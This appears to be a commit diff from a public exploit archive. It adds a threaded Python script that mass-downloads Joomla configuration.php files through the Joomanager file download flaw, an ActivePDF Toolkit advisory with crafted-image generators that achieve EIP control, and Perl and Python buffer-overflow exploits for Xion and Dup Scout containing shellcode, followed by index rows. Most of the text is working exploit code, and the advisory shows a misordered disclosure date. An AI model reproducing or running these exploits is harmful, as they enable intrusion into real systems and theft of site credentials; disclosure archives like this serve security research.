\ \\ // / | [*] GoogleDork: allinurl:index.php?option=com_joomanager |
\ |\___/| / | [*] GoogleDork: allinurl:/component/joomanager/ |
\,;-----;./ | [*] Coded: Luth1er [*] Date: 30 - 06 - 2017 |
| @@ @@ | | [*] GitHub: https://github.com/Luth1er |
\ -"""- / | - I take no responsibilities for the |
`-----´ | - use of this program ! |
+==========================================================+'''
if not args.targets:
os.system('clear')
print Lab_Collors.azul+Lab_Banners.Bulls
print ''
print Lab_Collors.ciano+"[*] Usage: "
print Lab_Collors.branco+"Joomanager_Afd.py --target Targets.txt"
print Lab_Collors.branco+"Joomanager_Afd.py -t Targets.txt"
print ''
exit()
print Lab_Collors.azul+Lab_Banners.Bulls
slowprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.purple+"@DreadPirateRobertt")
fastprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.azul+"t.me/Phantasm_Lab")
class COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(threading.Thread):
global Animation, fastprint
def __init__(self, targets):
threading.Thread.__init__(self)
targets = open(targets, 'r').readlines()
self.targets = targets
self.process = None
def run(self):
try:
count = 0
print ''
Animation("COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD", Lab_Collors.verde)
print ''
for target in self.targets:
try:
target = target.strip()
exploit3r = "index.php?option=com_joomanager&controller=details&task=download&path=configuration.php"
exploit_dir = str(target+exploit3r)
try:
path = urlparse.urlparse(target).path
url_title = target.replace(path, "")
title = requests.get(url_title)
except:
title = requests.get(target)
exploit = urllib2.urlopen(exploit_dir)
soup = BeautifulSoup.BeautifulSoup(title.content.decode('utf-8','ignore'))
Scraping_title = str(soup.title.text)
with open(soup.title.text+".php","wb") as Attatchment:
Attatchment.write(exploit.read())
print ''
print Lab_Collors.verde+"+==========================+"
print Lab_Collors.verde+"| Exploit Information: |"
print Lab_Collors.verde+"+================================================================================"
print Lab_Collors.purple+"[+] Target: {}".format(Lab_Collors.amarelo+url_title)
print Lab_Collors.purple+"[+] Title: {}".format(Lab_Collors.azul+Scraping_title)
fastprint(Lab_Collors.purple+"[+] Exploited: ========================================================> 100%")
print Lab_Collors.purple+"[+] Server: {}".format(str(Lab_Collors.amarelo+title.headers['server']))
try:
print Lab_Collors.purple+"[+] Connection: {}".format(Lab_Collors.branco+str(title.headers['Connection']))
except:
pass
print Lab_Collors.purple+"[+] Exploit: {}".format(Lab_Collors.vermelho+exploit3r)
print Lab_Collors.purple+"[+] Path: "+Lab_Collors.ciano+"/COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD/Title.php"
print Lab_Collors.verde+"+================================================================================"
print ''
count = count + 1
except KeyboardInterrupt:
print("Exiting")
sys.exit(1)
except Exception as Error:
print "Error as {}".format(Error)
pass
Animation("Logout....", Lab_Collors.vermelho)
print Lab_Collors.branco+"[!] Total Exploited: %s" % str(count)
print ''
sys.exit(1)
except KeyboardInterrupt:
print "Exiting...."
sys.exit(1)
def main():
try:
threads = 1
for host in range(int(threads)):
Init_Atck = COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(args.targets)
Init_Atck.daemon=True
Init_Atck.start()
while True: time.sleep(100)
except (KeyboardInterrupt, SystemExit):
print''
Animation(" Exit Threading....", Lab_Collors.vermelho)
if __name__ == '__main__':
try:
main()
except Exception as e:
print "[!] Error as %s" % e
exit()
except KeyboardInterrupt:
fastprint(Lab_Collors.vermelho+"[!] Keyboard as Interrupt....")
exit()

View file

@ -0,0 +1,201 @@
ActivePDF Toolkit < 8.1.0 multiple RCE
Introduction
============
The ActivePDF Toolkit is a Windows library which enhances business
processes to stamp, stitch, merge, form-fill, add digital signatures,
barcodes to PDF. Both .NET and native APIs are provided. Amongst many
other operations, this library can be used by applications to transform
images to PDF files.
Multiple vulnerabilities were identified in the Pictview image processing
library embedded by the Toolkit and signed by ActivePDF. They could allow
remote attackers to compromise applications relying on the Toolkit to
process untrusted images. Note that, while the example instances hereafter
use “exotic” file types, the parser determines the image type from magic
bytes, ignoring file extensions in most cases.
CVE
===
CVE-2018-7264
Affected versions
=================
ActivePDF Toolkit before 8.1.0 (build 8.1.0.19023)
Author
======
François Goichon - Google Security Team
CVE-2018-7264
=============
ActivePDF Toolkit < 8.1.0.19023 multiple RCE
Summary
-------
An image processing library embedded in the ActivePDF Toolkit product is
prone to multiple BSS out-of-bound and signedess errors which can yield
direct EIP control by overwriting function pointers, error handling
structures or IAT entries. Note that the affected library does not enable
ASLR.
Reproduction
------------
The following scripts can be used to generate crafted image files which
achieve EIP control when parsed or converted by the ActivePDF Toolkit (e.g.
via the ImageToPDF method), through different root causes. These examples
can be reproduced through both the .NET and native APIs and independently
from file extensions, however the .NET layer will hide the native crashes
and return -1. This may crash the library with a lock on, so only use in
test environments.
* Interchange File Format (.iff) and derivates
---
#!/usr/bin/env python2
#
# eax=28147510 ebx=00009c1c ecx=28147510 edx=00009c1c esi=28140e90
edi=02930a6c
# eip=41414141 esp=0061f264 ebp=0061f26c iopl=0 nv up ei pl nz na
po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010202
# 41414141 ?? ???
from struct import pack
header = "FORMXOXOILBM"
bodycontents = "AAA"
body = "BODY" + pack(">I", len(bodycontents)) + bodycontents
while (len(body) % 2) == 1:
body += "\x00"
base = 0x28147510
payload = pack("<I", base).ljust(0x28151114 - base, "A") + pack("<I", base)
cmap = "CMAP" + pack(">I", len(payload)) + payload
while (len(cmap) % 2) == 1:
cmap += "\x00"
outp = header + cmap + body
assert len(outp) >= 0x28
with open("test.iff", "wb") as f:
f.write(outp)
---
* Zoner Draw images (.zmf, .zbr)
---
#!/usr/bin/env python2
#
# eax=28151110 ebx=0000002e ecx=0000bc28 edx=2813eb10 esi=00000008
edi=028e0a6c
# eip=41414141 esp=2814550c ebp=41414141 iopl=0 nv up ei ng nz ac
pe cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
# 41414141 ?? ???
from struct import pack
header = pack("<III", 0x5c, 0xD4015ADD, 0x12345678)
header = header.ljust(9*4) + pack("<I", 0x3c)
header = header.ljust(0x3c)
base = 0x2814550C
payload = '\x00' * (0x28151124 - base) + pack("<I", base) + "A"*8
# can be triggered by multiple formats
header2 = pack("<H", 0x4d42)
header2 = header2.ljust(14) + pack("<I", 50-14)
header2 = header2.ljust(28) + pack("<HI", 0, 0)
header2 = header2.ljust(46) + pack("<I", len(payload)/4 + 1)
outp = header + header2 + payload
with open("test.zmf", "w") as f:
f.write(outp)
---
* Sun Raster images (.ras)
---
#!/usr/bin/python2
#
#WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding
can be inaccurate.
#eax=28151110 ebx=0000000c ecx=0000fc2d edx=2813eb10 esi=00000008
edi=02880a6c
#eip=41414141 esp=28141504 ebp=41414141 iopl=0 nv up ei ng nz ac pe
cy
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
#41414141 ?? ???
from struct import pack
header = pack(">IIIIIII", 0x59A66A95, 0x100, 1, 8, 0, 2, 1)
base = 0x28141504
payload = "".ljust(0x28151124 - base, "\x00") + pack("<I", base) + "A"*8
outp = header + pack(">I", len(payload)+1) + payload
with open("test.ras", "wb") as f:
f.write(outp)
---
* Truevision Targa images (.bpx)
---
#!/usr/bin/env python2
#
#eax=28151110 ebx=00000004 ecx=00000008 edx=2813eb10 esi=00000008
edi=028f0a6c
#eip=41414141 esp=0061f2a0 ebp=0061f2e8 iopl=0 nv up ei ng nz ac pe
cy
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
#41414141 ?? ???
from struct import pack
target = 0x2815112C
payload = "AAAA"
# TGA / PIC / BPX
base = { 3: 0x28147510, 4: 0x2814550c }
align = None
for al in [3, 4]:
if ((target - base[al]) % al) == 0:
align = al
break
assert align
header = "\x00\x01\x00"
header += pack("<H", (target - base[align])/align)
header += pack("<H", (len(payload)/align)+1)
header += chr(32 if align == 4 else 24)
header = header.ljust(16)
header += chr(1)
header = header.ljust(18)
with open("test.bpx", "wb") as f:
f.write(header + payload)
---
Remediation
-----------
Upgrade to ActivePDF Toolkit >= 8.1.0 (build 8.1.0.19023), which fixes the
problem by removing the affected image processing library. Note that this
also fixes the similar ZDI-16-354 vulnerability.
For more information and guidance, please contact the ActivePDF support
through their portal (https://support.activepdf.com).
Disclosure timeline
===================
2017/11/28 - Report sent to ActivePDF support
2017/11/28 - Support acknowledges the issue and confirms that the library
is scheduled to be removed from the product
2018/01/29 - Received notification from the ActivePDF support that the
Pictview image processing library had been removed from ActivePDF in build
8.1.0.19023
2017/02/26 - Public disclosure

177
exploits/windows/local/44243.pl Executable file
View file

@ -0,0 +1,177 @@
#!/usr/bin/perl
# ########################################################################
# Title: Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
# Vulnerability Type: Execute Code, Overflow UTF-16LE buffer, Memory corruption
# Date: Feb 18, 2018
# Author: James Anderson (synthetic)
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
# Exploit mitigation: There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
# About: The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
# Tested on: Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
# ########################################################################
# _ _ _ _
# ___ _ _ _ __ | |_| |__ ___| |_(_) ___
# / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
# \__ \ |_| | | | | |_| | | | __/ |_| | (__
# |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
# |___/
#
# ########################################################################
my $path = "/media/s4/DragonR.m3u";
my $buffer_length = 5000;
my $suboffset = 0x104;
my $NOP1 = "\x6F"; # add [edi], ch
my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx
# [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
my $crash = "A" x 260;
# [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
$crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
$crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR
my $offset_to_payload = length($crash);
# [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode.
# [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
$crash .= $NOP1; # NOP-eq
$crash .= "\x6a\x59"; # push 0 # pop ecx
$crash .= $NOP1; # NOP-eq
$crash .= "\x41"; # inc ecx
$crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
$crash .= $NOP1; # NOP-eq
$crash .= "\x41"; # inc ecx
$crash .= "\xC8"; # add al, cl
$crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;
# [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x3b\x41"; # mov edx, 41003b00
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
# [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
$crash .= "\x40"; # inc eax
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xec\x41"; # mov edx, 4100ec00
$crash .= "\x30"; # add [eax],dh
# [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x45\x41"; # mov edx, 41004500
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x46\x41"; # mov edx, 41004600
$crash .= "\x30"; # add [eax],dh
# [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x68\x41"; # mov edx, 41006800
$crash .= "\x30"; # add [eax],dh
# [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x78\x41"; # mov edx, 41007800
$crash .= "\x30"; # add [eax],dh
# [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x2F\x41"; # mov edx, 41002F00
$crash .= "\x30"; # add [eax],dh
# [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x63\x41"; # mov edx, 41006300
$crash .= "\x30"; # add [eax],dh
# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x64\x41"; # mov edx, 41006400
$crash .= "\x30"; # add [eax],dh
# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x8d\x41"; # mov edx, 41008d00
$crash .= "\x30"; # add [eax],dh
# [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xf8\x41"; # mov edx, 4100f800
$crash .= "\x30"; # add [eax],dh
# [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xb8\x41"; # mov edx, 4100b800
$crash .= "\x30"; # add [eax],dh
# [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x49\x41"; # mov edx, 41004900
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x4A\x41"; # mov edx, 41004A00
$crash .= "\x30"; # add [eax],dh
# [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x77\x41"; # mov edx, 41007700
$crash .= "\x30"; # add [eax],dh
# [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xd0\x41"; # mov edx, 4100d000
$crash .= "\x30"; # add [eax],dh
# [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe)
# *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
$crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
$crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)
# [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
my $shellcode =
"\x50". # "\x8b". # # BAD BYTE
# "\xec". # 0
"\x55". # "\x55".
# "\x8b". # 0 # BAD BYTE
"\xec". # "\xec".
# "\x68". # 0
"\x65". # "\x65".
# "\x78". # 0
"\x65". # "\x65".
# "\x2F". # 0
"\x68". # "\x68".
# "\x63". # 0
"\x6d". # "\x6d".
# "\x64". # 0
"\x2e". # "\x2e".
# "\x8d". # 0
"\x45". # "\x45".
# "\xf8". # 0
"\x50". # "\x50".
# "\xb8". # 0
"\xc7". # "\xc7".
# "\x93". # 0 # BAD BYTE
"\xc2". # "\xc2".
# "\x77". # 0
"\xff"; # "\xff".
# "\xd0"; # 0
$crash .= $shellcode;
$crash .= "C" x ($buffer_length - length($crash));
open(myfile, ">$path");
print myfile $crash;

70
exploits/windows/local/44244.py Executable file
View file

@ -0,0 +1,70 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
# Date: 02-22-2018
# Vulnerable Software: Dup Scout Enterprise v10.5.12
# Vendor Homepage: http://www.dupscout.com
# Version: 10.5.12
# Software Link: http://www.dupscout.com/downloads.html
# Tested On: Windows 7 x86
#
# bad chars \x00\x0a and everything above \x80
#
# PoC:
# 1. generate dupscout.txt, copy contents to clipboard
# 2. open app, select Server, select Connect
# 3. type anything into Share Name, paste dupscout.txt contents into User Name
# 4. select Connect and then OK
# 5. pop calc
#
filename="dupscout.txt"
junk = "A"*792
#0x10021144 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspg.dll]
eip = "\x44\x11\x02\x10"
fill = "\x43"*560
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
#Payload size: 440 bytes
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30"
"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61"
"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b"
"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72"
"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c"
"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59"
"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50"
"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d"
"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30"
"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37"
"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f"
"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d"
"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d"
"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75"
"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78"
"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a"
"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51"
"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42"
"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51"
"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42"
"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b"
"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f"
"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a"
"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62"
"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55"
"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43"
"\x55\x43\x30\x41\x41")
buffer = junk + eip + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

View file

@ -5888,6 +5888,8 @@ id,file,description,date,author,type,platform,port
44235,exploits/macos/dos/44235.c,"Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service",2017-08-19,"Brandon Azad",dos,macos,
44238,exploits/osx/dos/44238.c,"Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic",2017-01-10,"Brandon Azad",dos,osx,
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9566,6 +9568,9 @@ id,file,description,date,author,type,platform,port
44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx,
44243,exploits/windows/local/44243.pl,"Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit",2018-03-05,synthetic,local,windows,
44244,exploits/windows/local/44244.py,"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow",2018-03-05,bzyo,local,windows,
44246,exploits/linux/local/44246.txt,"Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation",2018-03-05,KoreLogic,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16292,6 +16297,8 @@ id,file,description,date,author,type,platform,port
44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php,
44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38557,7 +38564,7 @@ id,file,description,date,author,type,platform,port
42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",webapps,php,
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
@ -38952,4 +38959,6 @@ id,file,description,date,author,type,platform,port
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
442321,exploits/windows/webapps/442321.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,

Can't render this file because it is too large.